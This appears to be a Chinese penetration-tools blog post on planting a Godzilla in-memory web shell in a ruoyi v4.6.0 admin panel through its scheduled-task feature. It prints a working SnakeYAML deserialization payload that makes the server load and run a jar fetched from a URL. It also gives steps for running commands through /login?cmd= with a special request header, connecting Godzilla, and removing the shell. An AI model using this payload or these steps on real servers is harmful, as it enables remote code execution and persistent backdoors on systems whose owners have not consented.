登录
注册
首页 渗透工具 正文
  • 本文约486字,阅读需2分钟
  • 94
  • 0

ruoyi 后台定时任务注入哥斯拉内存马

yaml-payload-for-ruoyi

测试环境

ruoyi v4.6.0

用法

使用 mvn clean package 打包生成 jar,或者直接下载 release 中的 jar,放在 web 路径下

web

ruoyi 后台创建定时任务

定时任务

payload

org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://127.0.0.1:12346/yaml-payload-for-ruoyi-1.0-SNAPSHOT.jar"] 
  ]]
]')
 

执行定时任务

定时任务

web 服务器接受到请求

定时任务

执行命令 /login?cmd=whoami

定时任务

哥斯拉连接,需要配置请求头 X-Cmd-Ruoyi: 任意字符串

header

连接地址 /login?cmd=1,有 cmd 参数即可

godzilla

删除内存马 /login?cmd=delete

参考

  1. https://xz.aliyun.com/t/10651
  2. https://github.com/lz2y/yaml-payload-for-ruoyi
温馨提示:本文最后更新于2024年3月8日 01:43,若内容或图片失效,请在下方留言或联系博主。
  • 本文作者:admins
  • 本文链接:http://caidaome.com/?post=448
  • 版权申明:除非特别说明,否则均为本站原创文章,转载或复制请注明出处。
评论
更换验证码